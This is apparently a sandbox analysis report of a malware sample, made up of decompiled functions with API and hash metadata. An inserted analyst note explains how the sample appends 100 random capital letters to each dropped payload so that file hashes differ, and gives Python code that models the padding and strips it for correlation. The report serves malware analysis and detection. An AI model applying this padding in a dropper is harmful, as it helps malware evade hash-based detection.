      					E009AE8A1(0, E009AC90B(_t61, 0, _t68, _t70),  *(_t73 + 0x10), _t37);
      					goto L9;
      				} else {
      					_t43 = _t36 - 0x1a;
      					if(_t43 == 0) {
      						 *(_t73 - 0x2c) = 0 | E009AE919(_t61, _t68, _t70, E009AC90B(_t61, 0, _t68, _t70), _t61, _t61 >> 0x10) == 0x00000000;
      						L9:
      						if( *(_t73 - 0x2c) != 0) {
      							goto L10;
      						}
      					} else {
      						_t46 = _t43 - 0x62;
      						if(_t46 == 0) {
      							SetWindowLongA(_t70, 0xfffffffc,  *(_t73 - 0x30));
      							RemovePropA(_t70, _t72);
      							GlobalDeleteAtom(GlobalFindAtomA(_t72) & 0x0000ffff);
      							goto L10;
      						} else {
      							if(_t46 != 0x8e) {
      								L10:
      								_t42 = CallWindowProcA( *(_t73 - 0x30), _t70,  *(_t73 + 0xc),  *(_t73 + 0x10), _t61); // executed
      								 *(_t73 - 0x28) = _t42;
      							} else {
      								 *((intOrPtr*)(_t73 - 0x24)) = 0;
      								 *((intOrPtr*)(_t73 - 0x20)) = 0;
      								 *((intOrPtr*)(_t73 - 0x1c)) = 0;
      								 *((intOrPtr*)(_t73 - 0x18)) = 0;
      								_t72 = E009AC90B(_t61, 0, _t68, _t70);
      								E009AB92C(_t53, _t73 - 0x24, _t73 - 0x2c);
      								 *(_t73 - 0x28) = CallWindowProcA( *(_t73 - 0x30), _t70, 0x110,  *(_t73 + 0x10), _t61);
      								E009AD4D9(_t61, _t68, _t53, _t73 - 0x24,  *(_t73 - 0x2c));
      							}
      						}
      					}
      				}
      				return E00AAD32D(_t61, _t70, _t72);
      			}

      Instruction addresses (per-line address column of the decompiler view, detached by extraction): 0x009ae991 .. 0x009aeab5

      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 009AE998
      • GetPropA.USER32 ref: 009AE9B0
      • CallWindowProcA.USER32 ref: 009AEA1C
        • Part of subcall function 009AD4D9: GetWindowRect.USER32 ref: 009AD51C
        • Part of subcall function 009AD4D9: GetWindow.USER32(?,00000004), ref: 009AD539
      • SetWindowLongA.USER32 ref: 009AEA43
      • RemovePropA.USER32 ref: 009AEA4B
      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 009AEA52
      • GlobalDeleteAtom.KERNEL32(?), ref: 009AEA5C
        • Part of subcall function 009AB92C: GetWindowRect.USER32 ref: 009AB93B
      • CallWindowProcA.USER32 ref: 009AEAAF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
      • String ID: AfxOldWndProc423
      • API String ID: 3351853316-1060338832
      • Opcode ID: f9d6bee0aceb4f6df359234cee3e7a936cfc04181fd0add157aa9c3ff82c5291
      • Instruction ID: 7505383044b3cf3f7aeb9aed539d33e9e7d78c2ae6b79cfaf37c3d0789991863
      • Opcode Fuzzy Hash: f9d6bee0aceb4f6df359234cee3e7a936cfc04181fd0add157aa9c3ff82c5291
      • Instruction Fuzzy Hash: 5F314BB1C01219ABCB159FA9DC489EEBBB8FF8A310F04452AF412B6251CB3599108BA4
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Basic blocks (node: address range, calls; successors after ->; the executed/not-executed colouring of the rendered graph is not recoverable here):
      • 256: 9a3c20-9a3c94 call aab3f0, call 9a39a0, call 9a2ec0 -> 263, 264
      • 263: 9a3cba-9a3cd8 -> 265
      • 264: 9a3c96-9a3cb3 -> 265, 266
      • 265: 9a3cdb-9a3cf1 call 9a18a0, GetTickCount, call aac926 -> 271
      • 266: 9a3cb5-9a3cb8 -> 265
      • 271: 9a3cf3-9a3d0b call aac938 -> 274
      • 274: 9a3d0d-9a3d12 -> 275, 276
      • 275: 9a3d19-9a3d3e VirtualAlloc, call aab080 -> 279, 280
      • 276: 9a3d14 -> 275
      • 279: 9a3d53-9a3d71 call 9a3010, call 9a3870 -> 285, 286
      • 280: 9a3d40-9a3d50 -> 279
      • 285: 9a3d9e-9a3de9 call 9a3af0, call ac6167, call aab46a
      • 286: 9a3d73-9a3d91 -> 287, 288
      • 287: 9a3d93 -> 288
      • 288: 9a3d96-9a3d99 call 9a18a0 -> 285
      C-Code - Quality: 78%
      			E009A3C20(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
      				intOrPtr _v8;
      				char _v16;
      				signed int _v20;
      				char _v119;
      				void _v120;
      				intOrPtr _v124;
      				intOrPtr _v128;
      				char _v200;
      				char _v288;
      				char _v296;
      				char _v312;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t56;
      				signed int _t57;
      				void* _t62;
      				signed int _t71;
      				void* _t73;
      				signed int _t84;
      				intOrPtr _t89;
      				void* _t90;
      				void* _t91;
      				intOrPtr _t95;
      				intOrPtr _t106;
      				intOrPtr _t110;
      				intOrPtr _t117;
      				void* _t118;
      				void* _t124;
      				intOrPtr _t125;
      				void* _t126;
      				signed int _t128;
      				void* _t129;
      				void* _t131;
      				void* _t132;
      				void* _t133;
      
      				_push(0xffffffff);
      				_push(0xac7adb);
      				_push( *[fs:0x0]);
      				_t56 =  *0xd0c910; // 0x3a0e8b0c
      				_t57 = _t56 ^ _t128;
      				_v20 = _t57;
      				_push(_t57);
      				 *[fs:0x0] =  &_v16;
      				_t117 = _a12;
      				_t89 = 0;
      				_v128 = _a8;
      				_v124 = _t117;
      				_v120 = 0;
      				E00AAB3F0( &_v119, 0, 0x63);
      				_t131 = _t129 - 0x128 + 0xc;
      				E009A39A0( &_v312, 1); // executed
      				_v8 = 0;
      				_t62 = L009A2EC0( &_v288, _a4, 0x22, 0x40); // executed
      				if(_t62 != 0) {
      					_t95 =  *((intOrPtr*)(_v312 + 4));
      					_t96 = _t128 + _t95 - 0x134;
      					asm("sbb eax, eax");
      					_t67 = ( ~( *(_t128 + _t95 - 0xfc)) & 0xfffffffc) + 4;
      					__eflags = ( ~( *(_t128 + _t95 - 0xfc)) & 0xfffffffc) + 4;
      				} else {
      					_t110 =  *((intOrPtr*)(_v312 + 4));
      					_t96 = _t128 + _t110 - 0x134;
      					_t67 =  *(_t128 + _t110 - 0x128) | 0x00000002;
      					if( *((intOrPtr*)(_t128 + _t110 - 0x134 + 0x38)) == 0) {
      						_t67 = _t67 | 0x00000004;
      					}
      				}
      				E009A18A0(_t96, _t67, _t89);
      				E00AAC926(GetTickCount());
      				_t132 = _t131 + 4;
      				_t124 = 0;
      				do {
      					_t71 = E00AAC938(0);
      					asm("cdq");
      					_t124 = _t124 + 1;
      					 *((char*)(_t128 + _t124 - 0x75)) = _t71 % 0x1a + 0x41;
      				} while (_t124 < 0x64);
      				_t125 = _a16;
      				if(_t125 != 0) {
      					_t89 = 0x64;
      				}
      				_t113 = _t117 + _t89;
      				_t73 = VirtualAlloc(0, _t117 + _t89, 0x1000, 4); // executed
      				_t90 = _t73;
      				E00AAB080(_t90, _v128, _t117);
      				_t133 = _t132 + 0xc;
      				if(_t125 != 0) {
      					_v124 = _v124 + 0x64;
      					memcpy(_t117 + _t90,  &_v120, 0x19 << 2);
      					_t133 = _t133 + 0xc;
      					_t117 = _v124;
      				}
      				asm("cdq");
      				E009A3010( &_v296, _t90, _t117, _t113); // executed
      				if(E009A3870( &_v288) == 0) {
      					_t106 =  *((intOrPtr*)(_v312 + 4));
      					_t107 = _t128 + _t106 - 0x134;
      					_t84 =  *(_t128 + _t106 - 0x128) | 0x00000002;
      					if( *((intOrPtr*)(_t128 + _t106 - 0x134 + 0x38)) == 0) {
      						_t84 = _t84 | 0x00000004;
      					}
      					E009A18A0(_t107, _t84, 0);
      				}
      				_v8 = 0xffffffff;
      				E009A3AF0( &_v200, _t117);
      				_v200 = 0xad6de4;
      				E00AC6167( &_v200);
      				 *[fs:0x0] = _v16;
      				_pop(_t118);
      				_pop(_t126);
      				_pop(_t91);
      				return E00AAB46A(1, _t91, _v20 ^ _t128,  &_v200, _t118, _t126);
      			}

      Instruction addresses (per-line address column of the decompiler view, detached by extraction): 0x009a3c23 .. 0x009a3de9

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AllocCountIos_base_dtorTickVirtual_memmove_memset_randstd::ios_base::_
      • String ID: d
      • API String ID: 1404147012-2564639436
      • Opcode ID: 62f500e96477fa01046b9e466b51a96ac5f2c0f03e376694e73b85039525375a
      • Instruction ID: 6dd7e172a3f6e37a7437d3f9e28a9111523423d9b2361b0624719c4ef3440702
      • Opcode Fuzzy Hash: 62f500e96477fa01046b9e466b51a96ac5f2c0f03e376694e73b85039525375a
      • Instruction Fuzzy Hash: 8C51A271A012089FEB20DFA4DD82BDEB3B8EB45714F104169F906A72C2E735AE45CB91
      Uniqueness

      Uniqueness Score: -1.00%
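      The loop in E009A3C20 above seeds the CRT RNG from GetTickCount(), fills a 0x64-byte buffer with rand() % 0x1a + 0x41 (ASCII 'A'..'Z'), VirtualAllocs payload_length + 100 bytes, copies the payload in and, when the fourth argument (_a16) is non-zero, appends those 100 random capitals before the caller writes the file out and runs it through CreateProcessA. Every drop therefore carries a different trailing run of capitals and a different file hash. The following is an added analyst-side example, not code from the report or from the sample: it models that padding step so its effect on hashing can be seen, and provides the normalisation a practitioner would want when correlating dropped files. Function names (pad_like_sample, strip_suffix, stable_hash) are hypothetical; that E00AAC926 is srand is inferred from its GetTickCount argument and the adjacent _rand call; Python's random stands in for the MSVC CRT rand(), so the letter sequence differs from the sample's while the character class and length do not.

```python
import hashlib
import random
import re

SUFFIX_LEN = 0x64  # 100 bytes: the loop bound in the decompiled function
# Exactly 100 capital letters at the very end of the data.
SUFFIX_RE = re.compile(rb"[A-Z]{%d}$" % SUFFIX_LEN)


def random_suffix(seed: int, length: int = SUFFIX_LEN) -> bytes:
    """Emulate the padding loop: seed once (the sample uses GetTickCount),
    then emit rand() % 26 + 'A' for each of the 100 bytes."""
    rng = random.Random(seed)  # stand-in for the CRT srand/rand pair
    return bytes(rng.randrange(26) + 0x41 for _ in range(length))


def pad_like_sample(payload: bytes, append_suffix: bool, tick_count: int) -> bytes:
    """Model of E009A3C20's buffer build: payload copied into a fresh buffer,
    with the 100-byte A-Z tail appended only on the _a16 != 0 path."""
    if not append_suffix:
        return bytes(payload)
    return bytes(payload) + random_suffix(tick_count)


def strip_suffix(data: bytes) -> bytes:
    """Analyst-side normalisation: drop a trailing run of exactly 100 capitals.
    Data that does not end in such a run (including anything shorter than
    100 bytes) is returned unchanged, so the helper is safe on any file."""
    m = SUFFIX_RE.search(data)
    return data[:m.start()] if m else data


def stable_hash(data: bytes) -> str:
    """SHA-256 of the content with the per-run tail removed; two drops of the
    same payload made at different tick counts hash to the same value."""
    return hashlib.sha256(strip_suffix(data)).hexdigest()


if __name__ == "__main__":
    # Constructed stand-in payload (not a real dropped file).
    payload = b"MZ\x90\x00" + bytes(range(256)) * 4
    first = pad_like_sample(payload, True, tick_count=1111)
    second = pad_like_sample(payload, True, tick_count=2222)
    print("raw hashes differ:", hashlib.sha256(first).hexdigest() != hashlib.sha256(second).hexdigest())
    print("stable hashes match:", stable_hash(first) == stable_hash(second) == stable_hash(payload))
```

      Because the tail is appended rather than mixed into the payload, signatures and hash-based correlation should anchor on the leading bytes or on the stripped content; a rule keyed to the full file hash of one drop will miss the next one.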

      Control-flow Graph

      C-Code - Quality: 81%
      			E009A47D0(void* __ebx, void* __ecx, void* __edx) {
      				int _v8;
      				char _v16;
      				intOrPtr _v20;
      				char _v64;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t19;
      				void* _t23;
      				long _t24;
      				intOrPtr _t28;
      				void* _t29;
      				void* _t34;
      				void* _t60;
      				void* _t62;
      				void* _t63;
      				signed int _t64;
      				void* _t68;
      				signed int _t72;
      
      				_t60 = __edx;
      				_t43 = __ebx;
      				_push(0xffffffff);
      				_push(0xac7bc2);
      				_push( *[fs:0x0]);
      				_push(_t62);
      				_t19 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t19 ^ _t72);
      				 *[fs:0x0] =  &_v16;
      				_t68 = __ecx;
      				E009B5C3B(__ebx, _t62, 0);
      				_t23 = CreateMutexA(0, 1, "cplusplus_me"); // executed
      				_t63 = _t23;
      				_t24 = GetLastError();
      				if(_t63 == 0) {
      					L3:
      					CloseHandle(0);
      					L4:
      					E009B3218(_t68, "Local AppWizard-Generated Applications");
      					_push(4);
      					E009B1645(_t43, _t68, _t60, _t63, _t68, _t78); // executed
      					_t28 = E009A6291(_t78, 0x8c);
      					_v20 = _t28;
      					_v8 = 0;
      					_t79 = _t28;
      					if(_t28 == 0) {
      						_t29 = 0;
      						__eflags = 0;
      					} else {
      						_t29 = E009B513D(_t28, _t79, 0x80, 0xad76fc, 0xad70ec, 0xad78c8); // executed
      					}
      					_t64 = _t63 | 0xffffffff;
      					_push(_t29);
      					_v8 = _t64;
      					E009B3BAE(_t43, _t68, _t64, _t68, _t79);
      					E009B2204( &_v64, _t79);
      					_v8 = 1;
      					E009B16CB( &_v64);
      					_push( &_v64);
      					_t34 = E009B39FE(_t43, _t68, _t64, _t68, _t79); // executed
      					if(_t34 != 0) {
      						E009B0BD1( *((intOrPtr*)(_t68 + 0x20)), 5);
      						UpdateWindow( *( *((intOrPtr*)(_t68 + 0x20)) + 0x20));
      						_v8 = _t64;
      						E009B226E( &_v64,  *( *((intOrPtr*)(_t68 + 0x20)) + 0x20));
      						 *[fs:0x0] = _v16;
      						return 1;
      					} else {
      						_v8 = _t64;
      						E009B226E( &_v64, _t60);
      						 *[fs:0x0] = _v16;
      						return 0;
      					}
      				}
      				_t78 = _t24 - 0xb7;
      				if(_t24 != 0xb7) {
      					goto L4;
      				}
      				CloseHandle(_t63);
      				E00AACBDC(0);
      				goto L3;
      			}

      Instruction addresses (per-line address column of the decompiler view, detached by extraction): 0x009a47d0 .. 0x009a4916

      APIs
      • CreateMutexA.KERNELBASE(00000000,00000001,cplusplus_me), ref: 009A480C
      • GetLastError.KERNEL32 ref: 009A4814
      • CloseHandle.KERNEL32(00000000), ref: 009A4826
      • CloseHandle.KERNEL32(00000000), ref: 009A4835
      • UpdateWindow.USER32(?), ref: 009A48F0
      Strings
      • cplusplus_me, xrefs: 009A4803
      • Local AppWizard-Generated Applications, xrefs: 009A483B
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CloseHandle$CreateErrorLastMutexUpdateWindow
      • String ID: Local AppWizard-Generated Applications$cplusplus_me
      • API String ID: 672999849-156081089
      • Opcode ID: 3d63c35945c30da768bb598d1e937d79c93f5892c5f8100812724855d3ca8f35
      • Instruction ID: 2a7ca2cf7d25e33332f23caee58df4ac589351a21d6198c6c3793339b1f559a6
      • Opcode Fuzzy Hash: 3d63c35945c30da768bb598d1e937d79c93f5892c5f8100812724855d3ca8f35
      • Instruction Fuzzy Hash: 3C31CA71B45604BBDB04EBA4DD06BADB7B8FB84B10F00452AF916E33C1EFB565018B51
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      Basic blocks (node: address range, calls; successors after ->; the executed/not-executed colouring of the rendered graph is not recoverable here):
      • 331: 9a25e0-9a2629 call ac5aed -> 334, 335
      • 334: 9a262b-9a263c call ac5aed -> 343, 344
      • 335: 9a2656-9a2664 -> 337, 338
      • 337: 9a2688-9a268a -> 339
      • 338: 9a2666-9a266e -> 339, 341
      • 339: 9a2670-9a2674 -> 341, 345
      • 341: 9a268c -> 342
      • 342: 9a268e-9a2690 -> 347, 348
      • 343: 9a264e-9a2651 call ac5b15 -> 335
      • 344: 9a263e-9a2649 -> 343
      • 345: 9a2676-9a267e call ac5bb8 -> 347, 354
      • 347: 9a2692-9a2694 -> 351, 352
      • 348: 9a26f7-9a2719 call ac5b15
      • 351: 9a269a-9a269f call 9a2200 -> 357
      • 352: 9a2696-9a2698 -> 348
      • 354: 9a2680-9a2686 -> 342
      • 357: 9a26a4-9a26aa -> 358, 359
      • 358: 9a26ac-9a26c2 call aaaf63, call aab8c9 -> 359
      • 359: 9a26c7-9a26e0 call ac5aed -> 364, 365
      • 364: 9a26e2-9a26e3 -> 365
      • 365: 9a26e6-9a26f4 call ac5b15, call ac5b41 -> 348
      C-Code - Quality: 92%
      			E009A25E0(char _a4) {
      				intOrPtr _v8;
      				char _v16;
      				char _v20;
      				char _v24;
      				char _v28;
      				char _v40;
      				void* __edi;
      				signed int _t29;
      				intOrPtr _t33;
      				void* _t37;
      				intOrPtr _t39;
      				intOrPtr _t42;
      				void* _t45;
      				signed int _t48;
      				signed int _t49;
      				char _t51;
      				intOrPtr _t54;
      				signed int _t70;
      				intOrPtr _t71;
      				signed int _t73;
      
      				_push(0xffffffff);
      				_push(0xac7878);
      				_push( *[fs:0x0]);
      				_t29 =  *0xd0c910; // 0x3a0e8b0c
      				_push(_t29 ^ _t73);
      				 *[fs:0x0] =  &_v16;
      				E00AC5AED( &_v28, 0);
      				_t51 =  *0xd0e044; // 0x2788370
      				_v8 = 0;
      				_v20 = _t51;
      				if( *0xd1451c == 0) {
      					E00AC5AED( &_v24, 0);
      					if( *0xd1451c == 0) {
      						_t48 =  *0xd14518; // 0x2
      						_t49 = _t48 + 1;
      						 *0xd14518 = _t49;
      						 *0xd1451c = _t49;
      					}
      					E00AC5B15( &_v24);
      				}
      				_t67 = _a4;
      				_t70 =  *0xd1451c; // 0x1
      				_t33 =  *_a4;
      				if(_t70 >=  *((intOrPtr*)(_t33 + 0xc))) {
      					_t54 = 0;
      					goto L6;
      				} else {
      					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 8)) + _t70 * 4));
      					if(_t54 != 0) {
      						L10:
      						_t71 = _t54;
      						L11:
      						if(_t71 != 0) {
      							L19:
      							_v8 = 0xffffffff;
      							E00AC5B15( &_v28);
      							 *[fs:0x0] = _v16;
      							return _t71;
      						}
      						L12:
      						if(_t51 == 0) {
      							_t37 = E009A2200(_t65, _t67,  &_v20, _t67); // executed
      							__eflags = _t37 - 0xffffffff;
      							if(_t37 == 0xffffffff) {
      								E00AAAF63( &_v40, "bad cast");
      								E00AAB8C9( &_v40, 0xb0b234);
      							}
      							_t71 = _v20;
      							 *0xd0e044 = _t71;
      							E00AC5AED( &_a4, 0);
      							_t39 =  *((intOrPtr*)(_t71 + 4));
      							__eflags = _t39 - 0xffffffff;
      							if(_t39 < 0xffffffff) {
      								_t42 = _t39 + 1;
      								__eflags = _t42;
      								 *((intOrPtr*)(_t71 + 4)) = _t42;
      							}
      							E00AC5B15( &_a4);
      							E00AC5B41(__eflags, _t71);
      						} else {
      							_t71 = _t51;
      						}
      						goto L19;
      					}
      					L6:
      					if( *((char*)(_t33 + 0x14)) == 0) {
      						goto L10;
      					}
      					_t45 = E00AC5BB8();
      					if(_t70 >=  *((intOrPtr*)(_t45 + 0xc))) {
      						goto L12;
      					}
      					_t65 =  *((intOrPtr*)(_t45 + 8));
      					_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)) + _t70 * 4));
      					goto L11;
      				}
      			}

      Instruction addresses (per-line address column of the decompiler view, detached by extraction): 0x009a25e3 .. 0x009a2719

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A260D
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A2630
      • std::bad_exception::bad_exception.LIBCMT ref: 009A26B4
      • __CxxThrowException@8.LIBCMT ref: 009A26C2
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A26D5
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 009A26EF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
      • String ID: bad cast
      • API String ID: 2427920155-3145022300
      • Opcode ID: b63bb40a605e85aad4cbdeb144da549db63435c49cb74761d2286d879fd5a777
      • Instruction ID: 8aaa2ae0a3e97c24ae16e7ef299c8b524238f32f50709cb6e3a54bf9843e4356
      • Opcode Fuzzy Hash: b63bb40a605e85aad4cbdeb144da549db63435c49cb74761d2286d879fd5a777
      • Instruction Fuzzy Hash: 1131DFB1D012059BCB14DF68D981FAEB7B4EB05720F01465EE826A72D1EB31AE41CFE1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 89%
      			E009AD091(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
      				signed int _v8;
      				intOrPtr _v12;
      				long _v16;
      				long _v20;
      				struct tagRECT _v36;
      				void* _v40;
      				struct HWND__* _v44;
      				signed int _v48;
      				intOrPtr _v52;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				signed int _t59;
      				signed int _t65;
      				signed int _t75;
      				struct tagRECT* _t79;
      				intOrPtr _t80;
      				long _t90;
      				int _t91;
      				struct HWND__* _t94;
      				signed int _t95;
      
      				_t80 = __ecx;
      				_t59 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t59 ^ _t95;
      				_t89 = _a28;
      				_t79 = _a20;
      				_v52 = __ecx;
      				_v44 = 0;
      				_v12 = _a28;
      				_v16 = 0;
      				_v20 = 0;
      				if(_a24 == 0) {
      					GetClientRect( *(__ecx + 0x20),  &_v36);
      				} else {
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      				}
      				_t65 = _a16 & 0xffff7fff;
      				_v48 = _t65;
      				if(_t65 == 1) {
      					_t16 =  &_v40;
      					 *_t16 = _v40 & 0x00000000;
      					__eflags =  *_t16;
      				} else {
      					_v40 = BeginDeferWindowPos(8);
      				}
      				_t94 = GetTopWindow( *(_v52 + 0x20));
      				_t90 = 0;
      				_t98 = _t94;
      				if(_t94 == 0) {
      					L15:
      					if(_v48 != 1) {
      						__eflags = _a12 - _t90;
      						if(_a12 != _t90) {
      							__eflags = _v44 - _t90;
      							if(_v44 != _t90) {
      								_t67 = E009AC90B(_t79, _t80, _t89, _v44);
      								__eflags = _v48 - 2;
      								if(_v48 == 2) {
      									_v36.left = _v36.left + _t79->left;
      									_v36.top = _v36.top + _t79->top;
      									_v36.right = _v36.right - _t79->right;
      									_t46 =  &(_v36.bottom);
      									 *_t46 = _v36.bottom - _t79->bottom;
      									__eflags =  *_t46;
      								}
      								__eflags = _a16 & 0x00008000;
      								if((_a16 & 0x00008000) == 0) {
      									_t89 =  *_t67;
      									 *((intOrPtr*)( *_t67 + 0x68))( &_v36, _t90);
      									_t67 = E009AA887( &_v40, _v44,  &_v36);
      								}
      							}
      						}
      						__eflags = _v40 - _t90;
      						if(_v40 != _t90) {
      							_t67 = EndDeferWindowPos(_v40); // executed
      						}
      					} else {
      						if(_a28 == _t90) {
      							_t79->right = _v20;
      							_t67 = _v16;
      							_t79->top = _t90;
      							_t79->left = _t90;
      							_t79->bottom = _v16;
      						} else {
      							_t67 = CopyRect(_t79,  &_v36);
      						}
      					}
      					return E00AAB46A(_t67, _t79, _v8 ^ _t95, _t89, _t90, _t94);
      				} else {
      					do {
      						_t91 = GetDlgCtrlID(_t94);
      						_t75 = E009AC937(_t79, _t80, _t89, _t91, _t94, _t98, _t94);
      						if(_t91 != _a12) {
      							__eflags = _t91 - _a4;
      							if(__eflags >= 0) {
      								__eflags = _t91 - _a8;
      								if(__eflags <= 0) {
      									__eflags = _t75;
      									if(__eflags != 0) {
      										SendMessageA(_t94, 0x361, 0,  &_v40);
      									}
      								}
      							}
      						} else {
      							_v44 = _t94;
      						}
      						_t94 = GetWindow(_t94, 2);
      					} while (_t94 != 0);
      					_t90 = 0;
      					goto L15;
      				}
      			}

      APIs
      • GetClientRect.USER32(?,0000E900), ref: 009AD0D4
      • BeginDeferWindowPos.USER32(00000008), ref: 009AD0EC
      • GetTopWindow.USER32(?), ref: 009AD101
      • GetDlgCtrlID.USER32 ref: 009AD110
      • SendMessageA.USER32 ref: 009AD142
      • GetWindow.USER32(00000000,00000002), ref: 009AD14B
      • CopyRect.USER32 ref: 009AD169
      • KiUserCallbackDispatcher.NTDLL(00000000,?,00000001), ref: 009AD1E0
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$Rect$BeginCallbackClientCopyCtrlDeferDispatcherMessageSendUser
      • String ID:
      • API String ID: 1656430526-0
      • Opcode ID: b76027646c2de3bf257368c1b25bbc9ab76ab65359c51b62476a2be6b54d82e2
      • Instruction ID: 08128d41857aec13df687e7627c4aeacbe9386759df807e1a2362b7712367b04
      • Opcode Fuzzy Hash: b76027646c2de3bf257368c1b25bbc9ab76ab65359c51b62476a2be6b54d82e2
      • Instruction Fuzzy Hash: 36515971906219DFCF14DFA8C884AEEBBB9FF8A310F14456AE816B7210D7359941CFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 100%
      			E009BE5F2(void* __ecx) {
      				int _t5;
      				struct HDC__* _t15;
      				void* _t17;
      
      				_t17 = __ecx; // executed
      				_t5 = GetSystemMetrics(0xb); // executed
      				 *((intOrPtr*)(_t17 + 8)) = _t5;
      				 *((intOrPtr*)(_t17 + 0xc)) = GetSystemMetrics(0xc);
      				 *0xd0fd08 = GetSystemMetrics(2) + 1;
      				 *0xd0fd0c = GetSystemMetrics(3) + 1;
      				_t15 = GetDC(0);
      				 *((intOrPtr*)(_t17 + 0x18)) = GetDeviceCaps(_t15, 0x58);
      				 *((intOrPtr*)(_t17 + 0x1c)) = GetDeviceCaps(_t15, 0x5a);
      				return ReleaseDC(0, _t15);
      			}

      APIs
      • KiUserCallbackDispatcher.NTDLL ref: 009BE601
      • GetSystemMetrics.USER32 ref: 009BE608
      • GetSystemMetrics.USER32 ref: 009BE60F
      • GetSystemMetrics.USER32 ref: 009BE619
      • GetDC.USER32(00000000), ref: 009BE623
      • GetDeviceCaps.GDI32(00000000,00000058), ref: 009BE634
      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009BE63C
      • ReleaseDC.USER32 ref: 009BE644
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
      • String ID:
      • API String ID: 1031845853-0
      • Opcode ID: 7d8650470503e1df1ed3b98ec0262267ebf1475869bdcc8a8ea0e83db3f68ac6
      • Instruction ID: 1090c791e6d6d99b70c9d326a549d84300be7f222c9555e3c97ee825356e5e7c
      • Opcode Fuzzy Hash: 7d8650470503e1df1ed3b98ec0262267ebf1475869bdcc8a8ea0e83db3f68ac6
      • Instruction Fuzzy Hash: 92F01DB1E40714AAE7109FB2AC49B167F68EB84761F108527F6059B6C0DBB598528FD0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      C-Code - Quality: 77%
      			E009B368F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, int _a8, char* _a12, int _a16, signed int _a20) {
      				int* _v4;
      				signed int _v8;
      				char* _v12;
      				void* _v16;
      				signed int* _v20;
      				signed int _v24;
      				void* _v28;
      				char _v40;
      				signed int _v44;
      				char _v4120;
      				CHAR* _v4124;
      				char _v4128;
      				void* _v4132;
      				long _v4136;
      				int _v4140;
      				int _v4144;
      				char* _v4148;
      				int* _v4156;
      				char* _v4168;
      				unsigned int _t83;
      				char* _t85;
      				char* _t88;
      				signed int _t94;
      				signed int _t95;
      				CHAR* _t97;
      				signed int _t103;
      				signed int _t108;
      				signed int _t113;
      				char* _t118;
      				signed int _t121;
      				void* _t123;
      				long _t124;
      				char* _t127;
